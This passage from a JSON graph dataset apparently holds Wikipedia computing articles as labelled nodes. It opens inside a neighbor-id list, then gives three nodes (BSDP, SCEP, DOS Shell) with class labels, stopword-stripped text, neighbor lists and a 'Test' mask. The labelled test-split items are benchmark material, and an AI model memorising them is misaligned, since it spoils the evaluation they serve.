      9435,
      9436,
      9437,
      1247,
      9441,
      1250,
      9443,
      9444,
      1253,
      1255,
      1257,
      1258,
      9451,
      9454,
      1263,
      9456,
      1270,
      1274,
      9466,
      9468,
      1278,
      9471,
      1280,
      9476,
      1286,
      1291,
      9484,
      1293,
      1294,
      9487,
      1296,
      1298,
      9491,
      1301,
      1302,
      9495,
      1304,
      9496,
      9498,
      1307,
      9507,
      1325,
      1327,
      9520,
      1332,
      9525,
      1336,
      9529,
      1339,
      1340,
      1346,
      9540,
      1349,
      9542,
      1352,
      1353,
      9544,
      9547,
      9549,
      1359,
      1364,
      1365,
      9557,
      9563,
      9564,
      1374,
      9567,
      1376,
      1377,
      1378,
      1379,
      9571,
      9572,
      1383,
      1386,
      9579,
      9581,
      1390,
      9585,
      9590,
      1399,
      9591,
      9593,
      9594,
      9597,
      1406,
      9598,
      1408,
      9599,
      1410,
      9600,
      1412,
      9604,
      9606,
      1416,
      1417,
      1419,
      1420,
      1422,
      9614,
      9616,
      9618,
      1427,
      9619,
      1429,
      9620,
      1431,
      9625,
      1435,
      1436,
      9630,
      1439,
      9635,
      1444,
      1445,
      9637,
      1447,
      1448,
      9642,
      1451,
      9643,
      1454,
      9646,
      1461,
      1462,
      9655,
      1465,
      1467,
      1471,
      9665,
      1474,
      9671,
      1480,
      1482,
      1491,
      1492,
      9687,
      9688,
      1497,
      1501,
      9693,
      1503,
      9695,
      1508,
      9700,
      1510,
      1513,
      1515,
      1516,
      1517,
      9709,
      9710,
      1520,
      9712,
      1522,
      9714,
      1530,
      9722,
      9723,
      1533,
      1534,
      1535,
      9724,
      1537,
      9727,
      9728,
      9729,
      9730,
      9732,
      9733,
      9736,
      9738,
      1549,
      1551,
      9743,
      9745,
      9746,
      9747,
      1556,
      9749,
      1560,
      1561,
      9756,
      9757,
      1567,
      9759,
      9762,
      9764,
      9766,
      1577,
      9770,
      1579,
      1580,
      9771,
      1586,
      9780,
      9784,
      1593,
      1594,
      9786,
      9787,
      9789,
      9791,
      1604,
      1605,
      1606,
      9798,
      9802,
      1611,
      9803,
      1613,
      9806,
      1617,
      9811,
      1620,
      1621,
      9814,
      9815,
      1624,
      9816,
      9820,
      1631,
      1632,
      1634,
      9826,
      1636,
      1637,
      9829,
      1642,
      9835,
      9836,
      1646,
      1647,
      1648,
      9839,
      9840,
      9842,
      9843,
      9844,
      9846,
      1655,
      1656,
      9851,
      9854,
      1664,
      1668,
      9865,
      1674,
      1677,
      9872,
      9873,
      9874,
      9877,
      1686,
      1687,
      9880,
      9881,
      9882,
      9885,
      1694,
      9887,
      1699,
      9893,
      1702,
      1708,
      1710,
      9903,
      1712,
      1713,
      9907,
      9908,
      1721,
      9915,
      1728,
      9920,
      1730,
      9921,
      9925,
      9926,
      9927,
      1736,
      9931,
      9932,
      1744,
      1745,
      9936,
      1747,
      9938,
      9939,
      1750,
      9940,
      9943,
      9944,
      1754,
      9946,
      9947,
      9948,
      9952,
      1761,
      9953,
      1776,
      1777,
      9970,
      9971,
      9972,
      1782,
      1785,
      9978,
      1789,
      1790,
      1791,
      9981,
      9983,
      9985,
      1795,
      1796,
      9986,
      1799,
      9991,
      1801,
      1804,
      1805,
      9996,
      9998,
      10000,
      1810,
      1811,
      1812,
      1813,
      1814,
      10007,
      1816,
      1817,
      1820,
      10012,
      1822,
      10016,
      10018,
      1832,
      10025,
      1834,
      10027,
      1836,
      10030,
      1839,
      10032,
      10033,
      1842,
      1844,
      10036,
      1846,
      10040,
      1849,
      1851,
      1852,
      1853,
      1856,
      1859,
      1860,
      10051,
      10052,
      10053,
      10054,
      1865,
      10057,
      10058,
      1873,
      10065,
      10067,
      10068,
      1879,
      10076,
      1885,
      10078,
      10080,
      1890,
      1891,
      10083,
      10088,
      1900,
      1902,
      1904,
      10096,
      10101,
      1911,
      10104,
      1913,
      1916,
      1917,
      10109,
      1919,
      1920,
      10110,
      10113,
      1924,
      1926,
      1932,
      1933,
      1935,
      1937,
      10129,
      10130,
      1940,
      10135,
      10138,
      10141,
      1950,
      10142,
      1952,
      1958,
      10151,
      1960,
      10153,
      10154,
      10155,
      10156,
      1965,
      10157,
      10158,
      1968,
      10161,
      1971,
      1972,
      10169,
      1978,
      10170,
      10172,
      10173,
      10176,
      10177,
      1991,
      1993,
      10191,
      2000,
      2001,
      10193,
      2005,
      10202,
      2014,
      10208,
      2018,
      2023,
      10215,
      2027,
      2028,
      10219,
      10220,
      10221,
      10222,
      10223,
      10224,
      2035,
      10235,
      2045,
      2049,
      2050,
      2051,
      2055,
      2056,
      2058,
      10250,
      10251,
      2061,
      2062,
      2063,
      10255,
      10257,
      10258,
      10262,
      10267,
      2076,
      10270,
      10272,
      2081,
      10273,
      10278,
      10280,
      10284,
      10289,
      2098,
      2101,
      2105,
      2106,
      2107,
      2108,
      2109,
      10304,
      10306,
      10308,
      2117,
      2120,
      2125,
      10317,
      2131,
      2132,
      10325,
      2138,
      2140,
      10333,
      10337,
      10338,
      2147,
      2149,
      10341,
      10343,
      10346,
      10347,
      10349,
      10352,
      10353,
      2163,
      2164,
      10356,
      10357,
      2168,
      10363,
      2172,
      10365,
      10370,
      2179,
      2180,
      10373,
      2182,
      10377,
      2186,
      10380,
      10382,
      2191,
      2193,
      2194,
      2196,
      2197,
      2198,
      2199,
      10389,
      2201,
      10392,
      10393,
      10394,
      2205,
      10397,
      2207,
      2208,
      2211,
      2212,
      2213,
      10405,
      10406,
      2217,
      10409,
      10411,
      10413,
      2222,
      2224,
      2225,
      2227,
      2230,
      10422,
      2232,
      2233,
      2236,
      10428,
      10431,
      10433,
      2242,
      2244,
      2245,
      10436,
      2248,
      10440,
      2250,
      2252,
      10445,
      2257,
      2258,
      2259,
      2260,
      2261,
      10451,
      10453,
      2264,
      10455,
      2266,
      2267,
      10458,
      10459,
      10462,
      10463,
      10465,
      10469,
      10470,
      2279,
      10472,
      2281,
      2282,
      2283,
      10475,
      10476,
      10478,
      2287,
      2288,
      10480,
      2290,
      2291,
      2292,
      2293,
      2294,
      10489,
      2301,
      2303,
      10496,
      10499,
      2308,
      2309,
      2310,
      10503,
      10505,
      10506,
      10508,
      2317,
      10512,
      2322,
      2324,
      10517,
      2327,
      10520,
      10525,
      2334,
      2335,
      2338,
      2339,
      10530,
      10531,
      10535,
      2345,
      10537,
      2348,
      2349,
      2351,
      2355,
      10547,
      2358,
      2361,
      2363,
      2364,
      10559,
      2368,
      10560,
      10564,
      10565,
      2375,
      10568,
      2378,
      10570,
      2380,
      10573,
      2383,
      10575,
      2386,
      2389,
      10582,
      2392,
      2395,
      10587,
      2397,
      10590,
      2399,
      2401,
      10593,
      2404,
      10596,
      2406,
      2407,
      10597,
      10599,
      2410,
      2412,
      2413,
      10606,
      2415,
      2416,
      10608,
      10611,
      2421,
      2422,
      10614,
      2424,
      2430,
      10622,
      2432,
      10623,
      2435,
      10627,
      2439,
      10631,
      2442,
      2443,
      10638,
      2447,
      2448,
      2452,
      10645,
      2457,
      10649,
      10651,
      2462,
      10654,
      10658,
      2467,
      10660,
      10661,
      2474,
      2475,
      2476,
      2477,
      10666,
      10675,
      10676,
      2487,
      10680,
      10681,
      2490,
      10683,
      2493,
      2494,
      10691,
      10692,
      2505,
      2507,
      2509,
      10701,
      2513,
      10705,
      2516,
      10708,
      10712,
      10714,
      10719,
      2534,
      10730,
      10731,
      10732,
      10733,
      2545,
      10739,
      2551,
      2553,
      10747,
      10749,
      2558,
      2559,
      2560,
      10752,
      10754,
      2564,
      10757,
      2566,
      2568,
      10760,
      2570,
      10761,
      10763,
      2573,
      10764,
      2576,
      2579,
      10771,
      10774,
      2584,
      10776,
      2589,
      10785,
      10787,
      10788,
      10790,
      2599,
      10791,
      2601,
      10797,
      10801,
      10803,
      2612,
      10804,
      2614,
      10805,
      2616,
      10808,
      10809,
      10812,
      10813,
      10814,
      2625,
      10820,
      2630,
      2631,
      10824,
      2637,
      10834,
      10835,
      2645,
      10838,
      10839,
      10840,
      2651,
      2652,
      2654,
      2656,
      10848,
      2658,
      10850,
      2660,
      10851,
      10852,
      10855,
      10856,
      2665,
      2666,
      2670,
      10862,
      10863,
      2673,
      10866,
      10872,
      10873,
      10875,
      2684,
      2685,
      10878,
      2687,
      10879,
      10883,
      2692,
      2693,
      2694,
      10891,
      2704,
      10897,
      10898,
      2707,
      10900,
      2710,
      2711,
      10902,
      10903,
      2716,
      10909,
      10910,
      2721,
      2723,
      10917,
      2727,
      2730,
      10926,
      2735,
      2739,
      2741,
      10933,
      2744,
      10937,
      10939,
      10952,
      2761,
      10956,
      10957,
      10958,
      2768,
      2769,
      10961,
      10962,
      10965,
      10967,
      10970,
      10975,
      10977,
      2786,
      2789,
      2796,
      2798,
      2804,
      11000,
      2809,
      2810,
      2811,
      11001,
      2813,
      11004,
      11006,
      11008,
      11010,
      2819,
      11012,
      11013,
      2824,
      2825,
      2826,
      11017,
      2828,
      11018,
      11023,
      11024,
      11026,
      2836,
      11030,
      2839,
      11033,
      2843,
      11037,
      2847,
      2849,
      2852,
      2853,
      2854,
      2862,
      11060,
      11063,
      2872,
      11066,
      11068,
      2877,
      11072,
      11073,
      11075,
      2886,
      2887,
      2889,
      11082,
      11083,
      2892,
      2893,
      11084,
      11086,
      11088,
      2901,
      11095,
      2905,
      11097,
      2908,
      2910,
      11103,
      2914,
      2915,
      2916,
      11111,
      11112,
      11113,
      11114,
      11118,
      11120,
      2930,
      2931,
      11123,
      2933,
      2935,
      11127,
      11131,
      2940,
      11132,
      11134,
      2943,
      2944,
      2949,
      11145,
      2955,
      11153,
      2966,
      2970,
      2974,
      2978,
      2979,
      11171,
      2986,
      2987,
      11178,
      11179,
      2990,
      11180,
      11182,
      11184,
      2995,
      11187,
      11189,
      11196,
      11197,
      3006,
      3007,
      11198,
      11200,
      11202,
      11203,
      11204,
      11205,
      3015,
      11207,
      11208,
      11212,
      11218,
      3030,
      3031,
      3032,
      3033,
      3034,
      3035,
      11227,
      11228,
      3042,
      11235,
      11237,
      3046,
      11239,
      3048,
      3049,
      3051,
      3053,
      11246,
      3055,
      3056,
      11248,
      3058,
      11249,
      11251,
      3061,
      11255,
      11257,
      11259,
      3068,
      11260,
      11262,
      11263,
      11267,
      11269,
      11270,
      11273,
      3083,
      3086,
      3089,
      3091,
      11283,
      11287,
      3096,
      3101,
      3102,
      11293,
      11294,
      11295,
      3106,
      3107,
      11301,
      3114,
      11306,
      3120,
      11315,
      3124,
      11319,
      11322,
      3131,
      11323,
      3133,
      3134,
      3135,
      11324,
      3137,
      11325,
      11332,
      3142,
      3144,
      11338,
      3147,
      3148,
      3151,
      3152,
      11350,
      11351,
      3160,
      11353,
      3162,
      11354,
      11356,
      3167,
      11359,
      11363,
      3172,
      3176,
      11368,
      3178,
      11371,
      3181,
      3182,
      11376,
      3186,
      3188,
      11381,
      11382,
      3191,
      11383,
      3197,
      11389,
      11390,
      11392,
      3201,
      3204,
      11396,
      11399,
      11402,
      11403,
      3214,
      3216,
      11411,
      3221,
      3222,
      11413,
      11418,
      3228,
      3229,
      11422,
      11424,
      3235,
      11428,
      3237,
      11432,
      3241,
      11434,
      3246,
      11439,
      3248,
      11440,
      3250,
      11442,
      11444,
      11446,
      3257,
      11449,
      11454,
      11458,
      11464,
      11468,
      11472,
      3281,
      11474,
      11475,
      3284,
      3285,
      3286,
      3287,
      3289,
      3290,
      11481,
      3292,
      3293,
      11486,
      11487,
      3296,
      11488,
      11489,
      3299,
      3300,
      11492,
      3304,
      11501,
      11503,
      3312,
      3314,
      11506,
      3321,
      11513,
      3323,
      11517,
      3326,
      11519,
      3328,
      11520,
      3330,
      3331,
      11521,
      11524,
      3334,
      11525,
      11528,
      3338,
      3339,
      3340,
      3341,
      11530,
      11535,
      11539,
      3351,
      3352,
      11543,
      11546,
      3355,
      11547,
      11549,
      3358,
      3359,
      11552,
      3362,
      11555,
      11559,
      11562,
      3371,
      11563,
      3373,
      3374,
      11566,
      11568,
      11570,
      3379,
      11573,
      11576,
      11581,
      3393,
      3394,
      3395,
      3398,
      3399,
      3400,
      3401,
      11595,
      3406,
      11598,
      11601,
      3412,
      3413,
      3414,
      11604,
      11605,
      11606,
      11607,
      11608,
      3420,
      11610,
      11614,
      11615,
      3426,
      3429,
      3430,
      11622,
      11628,
      11633,
      3442,
      3443,
      11635,
      3446,
      11641,
      11644,
      3454,
      11649,
      11651,
      11652,
      3463,
      11656,
      3465,
      3466,
      11657,
      3469,
      11661,
      11663,
      11664,
      11667,
      3477,
      11669,
      11670,
      11672,
      11673,
      3482,
      11675,
      3484,
      3486,
      3487,
      3488,
      11680,
      11682,
      11683,
      11685,
      3496,
      11688,
      3498,
      11689,
      11691,
      11698,
      3507,
      3522,
      3527,
      3529,
      3531,
      3533,
      3535,
      3540,
      3545,
      3550,
      3562,
      3567,
      3571,
      3572,
      3573,
      3577,
      3578,
      3581,
      3582,
      3583,
      3587,
      3594,
      3595,
      3597,
      3598,
      3600,
      3602,
      3603,
      3604,
      3605,
      3609,
      3610,
      3615,
      3618,
      3620,
      3625,
      3626,
      3627,
      3631,
      3633,
      3634,
      3636,
      3644,
      3647,
      3648,
      3649,
      3650,
      3651,
      3654,
      3659,
      3664,
      3665,
      3669,
      3670,
      3672,
      3674,
      3675,
      3676,
      3677,
      3684,
      3685,
      3691,
      3698,
      3700,
      3710,
      3712,
      3714,
      3716,
      3717,
      3718,
      3719,
      3720,
      3722,
      3723,
      3725,
      3727,
      3734,
      3735,
      3739,
      3742,
      3743,
      3744,
      3745,
      3746,
      3750,
      3753,
      3760,
      3761,
      3766,
      3771,
      3777,
      3791,
      3793,
      3794,
      3795,
      3799,
      3800,
      3803,
      3804,
      3805,
      3807,
      3815,
      3816,
      3820,
      3822,
      3828,
      3830,
      3834,
      3841,
      3849,
      3853,
      3856,
      3857,
      3859,
      3862,
      3865,
      3869,
      3871,
      3873,
      3876,
      3877,
      3878,
      3881,
      3885,
      3890,
      3894,
      3895,
      3900,
      3903,
      3904,
      3908,
      3913,
      3916,
      3918,
      3922,
      3931,
      3937,
      3938,
      3939,
      3940,
      3942,
      3943,
      3950,
      3951,
      3963,
      3966,
      3969,
      3970,
      3971,
      3975,
      3977,
      3978,
      3980,
      3981,
      3996,
      4001,
      4004,
      4005,
      4006,
      4010,
      4011,
      4013,
      4019,
      4020,
      4029,
      4032,
      4033,
      4039,
      4040,
      4051,
      4052,
      4053,
      4056,
      4059,
      4067,
      4068,
      4071,
      4073,
      4074,
      4075,
      4076,
      4085,
      4088,
      4089,
      4090,
      4100,
      4104,
      4106,
      4111,
      4112,
      4114,
      4120,
      4126,
      4140,
      4145,
      4147,
      4151,
      4153,
      4154,
      4160,
      4161,
      4162,
      4165,
      4166,
      4171,
      4173,
      4174,
      4180,
      4182,
      4184,
      4192,
      4194,
      4200,
      4201,
      4207,
      4218,
      4220,
      4221,
      4225,
      4231,
      4233,
      4237,
      4238,
      4244,
      4245,
      4247,
      4248,
      4255,
      4257,
      4264,
      4268,
      4273,
      4277,
      4282,
      4284,
      4286,
      4294,
      4296,
      4298,
      4302,
      4305,
      4307,
      4309,
      4310,
      4316,
      4318,
      4325,
      4326,
      4338,
      4341,
      4347,
      4349,
      4365,
      4369,
      4373,
      4374,
      4379,
      4387,
      4390,
      4398,
      4401,
      4403,
      4407,
      4408,
      4409,
      4419,
      4421,
      4423,
      4424,
      4431,
      4432,
      4433,
      4435,
      4438,
      4439,
      4441,
      4449,
      4454,
      4457,
      4458,
      4459,
      4464,
      4470,
      4473,
      4475,
      4479,
      4480,
      4485,
      4492,
      4499,
      4501,
      4502,
      4505,
      4506,
      4507,
      4511,
      4512,
      4513,
      4514,
      4515,
      4516,
      4519,
      4520,
      4521,
      4525,
      4528,
      4532,
      4538,
      4546,
      4548,
      4550,
      4558,
      4561,
      4563,
      4568,
      4571,
      4574,
      4576,
      4580,
      4589,
      4597,
      4601,
      4604,
      4607,
      4611,
      4614,
      4615,
      4616,
      4623,
      4624,
      4628,
      4630,
      4633,
      4637,
      4638,
      4640,
      4643,
      4645,
      4656,
      4657,
      4659,
      4661,
      4666,
      4669,
      4674,
      4677,
      4679,
      4697,
      4702,
      4708,
      4710,
      4712,
      4727,
      4729,
      4731,
      4737,
      4741,
      4745,
      4750,
      4771,
      4772,
      4775,
      4777,
      4789,
      4799,
      4801,
      4803,
      4807,
      4808,
      4810,
      4814,
      4815,
      4816,
      4819,
      4822,
      4827,
      4832,
      4834,
      4835,
      4844,
      4850,
      4852,
      4854,
      4857,
      4858,
      4859,
      4865,
      4870,
      4878,
      4879,
      4885,
      4888,
      4900,
      4902,
      4908,
      4910,
      4919,
      4929,
      4931,
      4933,
      4943,
      4944,
      4949,
      4961,
      4966,
      4968,
      4972,
      4974,
      4978,
      4982,
      4992,
      4995,
      4996,
      4998,
      5000,
      5008,
      5013,
      5016,
      5019,
      5022,
      5023,
      5024,
      5026,
      5031,
      5032,
      5036,
      5040,
      5041,
      5043,
      5044,
      5045,
      5046,
      5047,
      5048,
      5049,
      5054,
      5057,
      5063,
      5065,
      5066,
      5067,
      5069,
      5070,
      5072,
      5075,
      5077,
      5078,
      5079,
      5080,
      5084,
      5093,
      5096,
      5103,
      5105,
      5106,
      5114,
      5115,
      5120,
      5123,
      5129,
      5134,
      5138,
      5139,
      5142,
      5145,
      5148,
      5154,
      5158,
      5160,
      5165,
      5167,
      5174,
      5177,
      5179,
      5190,
      5196,
      5198,
      5205,
      5209,
      5214,
      5221,
      5222,
      5223,
      5230,
      5231,
      5240,
      5242,
      5243,
      5245,
      5247,
      5249,
      5251,
      5261,
      5262,
      5264,
      5266,
      5279,
      5280,
      5281,
      5283,
      5286,
      5292,
      5293,
      5296,
      5298,
      5300,
      5301,
      5306,
      5312,
      5313,
      5314,
      5315,
      5316,
      5318,
      5320,
      5322,
      5324,
      5326,
      5327,
      5328,
      5329,
      5336,
      5339,
      5346,
      5347,
      5356,
      5357,
      5360,
      5361,
      5362,
      5363,
      5367,
      5368,
      5370,
      5371,
      5373,
      5374,
      5378,
      5380,
      5384,
      5391,
      5397,
      5404,
      5406,
      5409,
      5410,
      5411,
      5413,
      5418,
      5425,
      5429,
      5450,
      5452,
      5454,
      5457,
      5470,
      5474,
      5475,
      5482,
      5484,
      5489,
      5492,
      5500,
      5503,
      5506,
      5520,
      5523,
      5526,
      5529,
      5534,
      5535,
      5536,
      5542,
      5546,
      5549,
      5567,
      5569,
      5578,
      5583,
      5585,
      5594,
      5596,
      5597,
      5600,
      5603,
      5605,
      5612,
      5613,
      5616,
      5618,
      5619,
      5626,
      5629,
      5636,
      5638,
      5640,
      5643,
      5647,
      5650,
      5654,
      5660,
      5661,
      5663,
      5666,
      5668,
      5669,
      5670,
      5671,
      5673,
      5678,
      5679,
      5681,
      5685,
      5694,
      5696,
      5697,
      5702,
      5703,
      5705,
      5706,
      5707,
      5709,
      5711,
      5713,
      5714,
      5723,
      5725,
      5727,
      5730,
      5736,
      5737,
      5738,
      5741,
      5742,
      5743,
      5747,
      5748,
      5751,
      5754,
      5759,
      5760,
      5768,
      5769,
      5774,
      5779,
      5784,
      5785,
      5788,
      5791,
      5797,
      5799,
      5803,
      5813,
      5818,
      5819,
      5822,
      5823,
      5824,
      5833,
      5840,
      5847,
      5856,
      5858,
      5869,
      5872,
      5873,
      5874,
      5877,
      5880,
      5887,
      5895,
      5909,
      5910,
      5912,
      5920,
      5921,
      5922,
      5924,
      5925,
      5927,
      5928,
      5930,
      5952,
      5959,
      5960,
      5964,
      5968,
      5969,
      5970,
      5976,
      5978,
      5981,
      5982,
      5985,
      5987,
      5988,
      5989,
      5990,
      5993,
      6012,
      6014,
      6015,
      6016,
      6018,
      6020,
      6021,
      6022,
      6028,
      6037,
      6044,
      6047,
      6049,
      6056,
      6057,
      6062,
      6075,
      6078,
      6084,
      6086,
      6087,
      6088,
      6092,
      6093,
      6098,
      6100,
      6112,
      6114,
      6115,
      6116,
      6119,
      6120,
      6122,
      6126,
      6128,
      6129,
      6130,
      6133,
      6134,
      6135,
      6137,
      6138,
      6142,
      6143,
      6144,
      6147,
      6148,
      6150,
      6153,
      6154,
      6155,
      6157,
      6161,
      6165,
      6166,
      6171,
      6172,
      6177,
      6179,
      6180,
      6183,
      6188,
      6189,
      6197,
      6198,
      6207,
      6210,
      6212,
      6216,
      6218,
      6221,
      6226,
      6227,
      6228,
      6231,
      6234,
      6236,
      6240,
      6243,
      6244,
      6245,
      6248,
      6251,
      6257,
      6258,
      6263,
      6265,
      6266,
      6270,
      6276,
      6277,
      6281,
      6283,
      6286,
      6289,
      6291,
      6293,
      6295,
      6296,
      6297,
      6300,
      6303,
      6311,
      6325,
      6329,
      6333,
      6338,
      6342,
      6345,
      6347,
      6351,
      6352,
      6354,
      6356,
      6358,
      6361,
      6363,
      6365,
      6369,
      6371,
      6372,
      6375,
      6377,
      6378,
      6379,
      6380,
      6382,
      6385,
      6391,
      6393,
      6396,
      6398,
      6402,
      6406,
      6412,
      6413,
      6416,
      6422,
      6431,
      6436,
      6437,
      6438,
      6442,
      6443,
      6445,
      6446,
      6448,
      6458,
      6459,
      6462,
      6470,
      6476,
      6479,
      6480,
      6482,
      6483,
      6486,
      6487,
      6490,
      6491,
      6493,
      6494,
      6496,
      6499,
      6502,
      6506,
      6510,
      6520,
      6521,
      6523,
      6524,
      6528,
      6532,
      6533,
      6537,
      6539,
      6550,
      6551,
      6556,
      6557,
      6558,
      6559,
      6566,
      6568,
      6570,
      6579,
      6581,
      6583,
      6587,
      6591,
      6594,
      6596,
      6597,
      6601,
      6606,
      6614,
      6617,
      6620,
      6624,
      6625,
      6634,
      6635,
      6638,
      6639,
      6643,
      6651,
      6652,
      6654,
      6657,
      6664,
      6669,
      6674,
      6675,
      6677,
      6679,
      6680,
      6683,
      6685,
      6692,
      6694,
      6699,
      6700,
      6701,
      6713,
      6716,
      6717,
      6718,
      6721,
      6727,
      6729,
      6742,
      6743,
      6744,
      6747,
      6751,
      6754,
      6759,
      6760,
      6763,
      6768,
      6771,
      6772,
      6774,
      6775,
      6778,
      6780,
      6785,
      6787,
      6790,
      6791,
      6796,
      6797,
      6800,
      6803,
      6807,
      6810,
      6812,
      6820,
      6823,
      6827,
      6831,
      6834,
      6837,
      6838,
      6846,
      6849,
      6855,
      6860,
      6864,
      6866,
      6869,
      6875,
      6893,
      6900,
      6902,
      6906,
      6908,
      6910,
      6916,
      6919,
      6920,
      6921,
      6922,
      6925,
      6926,
      6933,
      6934,
      6935,
      6943,
      6950,
      6958,
      6962,
      6963,
      6966,
      6969,
      6970,
      6973,
      6974,
      6979,
      6981,
      6984,
      6986,
      6988,
      6990,
      6991,
      6997,
      6998,
      7005,
      7011,
      7012,
      7017,
      7020,
      7022,
      7026,
      7027,
      7031,
      7032,
      7036,
      7039,
      7041,
      7049,
      7051,
      7052,
      7053,
      7057,
      7067,
      7070,
      7074,
      7076,
      7078,
      7081,
      7083,
      7087,
      7088,
      7093,
      7095,
      7097,
      7100,
      7112,
      7118,
      7121,
      7123,
      7128,
      7136,
      7138,
      7139,
      7140,
      7141,
      7147,
      7148,
      7150,
      7151,
      7152,
      7155,
      7157,
      7159,
      7163,
      7172,
      7175,
      7176,
      7181,
      7187,
      7188,
      7189,
      7191,
      7192,
      7195,
      7196,
      7202,
      7204,
      7209,
      7211,
      7217,
      7219,
      7224,
      7238,
      7242,
      7243,
      7246,
      7249,
      7253,
      7256,
      7261,
      7267,
      7272,
      7285,
      7288,
      7290,
      7291,
      7292,
      7293,
      7296,
      7301,
      7307,
      7308,
      7309,
      7313,
      7318,
      7325,
      7326,
      7329,
      7338,
      7340,
      7341,
      7343,
      7346,
      7347,
      7351,
      7354,
      7355,
      7356,
      7357,
      7358,
      7363,
      7364,
      7368,
      7369,
      7372,
      7374,
      7375,
      7376,
      7377,
      7378,
      7379,
      7380,
      7381,
      7382,
      7387,
      7392,
      7398,
      7403,
      7412,
      7413,
      7415,
      7420,
      7421,
      7422,
      7423,
      7426,
      7428,
      7430,
      7431,
      7439,
      7443,
      7444,
      7451,
      7457,
      7460,
      7461,
      7463,
      7472,
      7473,
      7476,
      7477,
      7480,
      7481,
      7482,
      7483,
      7485,
      7486,
      7497,
      7502,
      7506,
      7507,
      7511,
      7512,
      7513,
      7515,
      7519,
      7523,
      7525,
      7526,
      7529,
      7532,
      7534,
      7536,
      7543,
      7544,
      7546,
      7547,
      7552,
      7555,
      7558,
      7561,
      7562,
      7565,
      7566,
      7567,
      7571,
      7573,
      7583,
      7588,
      7591,
      7593,
      7601,
      7605,
      7607,
      7608,
      7616,
      7618,
      7626,
      7629,
      7633,
      7646,
      7648,
      7649,
      7655,
      7656,
      7664,
      7666,
      7672,
      7682,
      7684,
      7685,
      7694,
      7695,
      7696,
      7697,
      7700,
      7701,
      7702,
      7709,
      7713,
      7717,
      7718,
      7720,
      7722,
      7728,
      7733,
      7738,
      7739,
      7742,
      7746,
      7748,
      7750,
      7755,
      7761,
      7762,
      7763,
      7764,
      7768,
      7769,
      7771,
      7772,
      7774,
      7775,
      7780,
      7785,
      7789,
      7794,
      7795,
      7796,
      7805,
      7806,
      7807,
      7812,
      7813,
      7814,
      7818,
      7821,
      7822,
      7824,
      7825,
      7830,
      7835,
      7836,
      7838,
      7840,
      7844,
      7847,
      7848,
      7849,
      7850,
      7859,
      7862,
      7867,
      7870,
      7872,
      7875,
      7879,
      7880,
      7882,
      7885,
      7889,
      7893,
      7895,
      7901,
      7904,
      7905,
      7914,
      7917,
      7919,
      7924,
      7928,
      7930,
      7934,
      7941,
      7943,
      7945,
      7947,
      7953,
      7954,
      7955,
      7961,
      7962,
      7967,
      7978,
      7980,
      7981,
      7983,
      7986,
      7987,
      7991,
      7998,
      7999,
      8001,
      8007,
      8012,
      8014,
      8019,
      8020,
      8024,
      8030,
      8031,
      8041,
      8063,
      8065,
      8067,
      8069,
      8076,
      8079,
      8084,
      8092,
      8096,
      8098,
      8113,
      8114,
      8118,
      8121,
      8122,
      8124,
      8126,
      8131,
      8136,
      8137,
      8139,
      8141,
      8148,
      8149,
      8158,
      8162,
      8168,
      8169,
      8179,
      8180,
      8181,
      8191
    ],
    "mask": "Test"
  },
  {
    "node_id": 7984,
    "label": 5,
    "text": "Boot_Service_Discovery_Protocol:boot service discovery protocol boot service discovery protocol bsdp apple-developed standards-conforming extension dhcp allows macintosh computers boot bootable images network instead local storage media cd dvd hard disk dhcp options used vendor-specific information option number 43 vendor class identifier option number 60 three versions bsdp though usually version 1.0 used versions enable client choose several bootable images offered server reference implementation bsdp darwin bootp server part mac os netboot feature dhcp server client send vendor class option contains ascii-encoded string three parts delimited character first part aaplbsdpc advertises bsdp capability second part client architecture ppc i386 third part system identifier example intel-based imac sends vendor class list microsoft vendor classes found according dhcp option carrying number 43 reserved vendor specific information information stored following format vendor wants convey multiple options within option field done encapsulated vendor-specific extensions vendor encapsulated extensions contain one concatenated fields field consists following table describes possible field types numeric fields interpreted unsigned big endian integers following example illustrates construction vendor encapsulated option first field 01 01 02 means packet bsdp select message 01 declares field specifies bsdp message type next 01 indicates field contents one byte long — 02 code select following 08 04 81 00 07 e5 means boot image id 2164262885 selected finally 82 0a 4e 65 74 42 6f 6f 74 30 30 31 means string 0x0a 10 characters namely netboot001 name system boot",
    "neighbors": [
      10242,
      3847,
      649,
      4490,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      2996,
      9909,
      6651,
      10171,
      3133,
      3006,
      4797,
      5181,
      5437,
      7364,
      2887,
      8265,
      842,
      2509,
      4687,
      5843,
      8404,
      2904,
      5469,
      5470,
      5471,
      5472,
      3297,
      10341,
      10344,
      11112,
      367,
      8432,
      499,
      2811,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 7985,
    "label": 4,
    "text": "Simple_Certificate_Enrollment_Protocol:simple certificate enrollment protocol simple certificate enrollment protocol scep internet draft internet engineering task force ietf protocol used numerous manufacturers network equipment software developing simplified means handling certificates large-scale implementation everyday users well referenced industry standards protocol designed make issuing digital certificates scalable possible idea standard network user able request digital certificate electronically simply possible processes usually required intensive input network administrators suited large-scale deployments simple certificate enrollment protocol popular widely available tested certificate enrollment protocol although widely used example cisco ios operating system concerns raised able strongly authenticate certificate requests made users devices since exactly issues apply certificate issue protocols certificate management protocol certificate management cms clear real concern effectively abandoned original sponsors around 2010 internet draft describing protocol revived 2015 due widespread use industry standards updating algorithms used correcting numerous issues original specification accumulated considerable amount detritus time",
    "neighbors": [
      5834,
      1836,
      6704,
      9744,
      11387,
      62
    ],
    "mask": "Test"
  },
  {
    "node_id": 7986,
    "label": 3,
    "text": "DOS_Shell:dos shell dos shell file manager debuted ms-dos ibm pc dos version 4.0 june 1988 discontinued ms-dos version 6.22 remained part supplemental disk supplemental disk could ordered could downloaded microsoft ftp server dos shell retained pc dos pc dos 2000 dos shell one first successful attempts create basic graphical user interface gui type file manager dos although properly referred text user interface tui character-oriented windows cow even though graphical modes available supported hardware vga-equipped pcs additionally one first guis developed microsoft later inspired design windows shell much like dos version file manager found windows versions 3.11 nt 3.51 file explorer later versions ms-dos 4.x 5.x program implemented com file codice_1 ms-dos 6 executable .exe filename extension codice_2 shell includes common features seen file managers copying moving renaming files well ability launch applications double-click shell could run command codice_3 ability set simple colours styles shell also help system program list task swapper like many modern file managers ability display dual hierarchy directory file lists i.e left right panes displaying list directory contents hierarchical file path current working directory mouse supported however like dos application required appropriate device driver one feature ability list files hard drive single alphabetized list along path attributes permitted user compare versions file different directories attributes easily spot duplicates dos shell incapable full multitasking supported rudimentary task switching could switch programs running memory cost performance hit however running programs fit conventional memory area support swapping disk time windows 3.1x graphical user interface became much popular among computer users windows capable multitasking 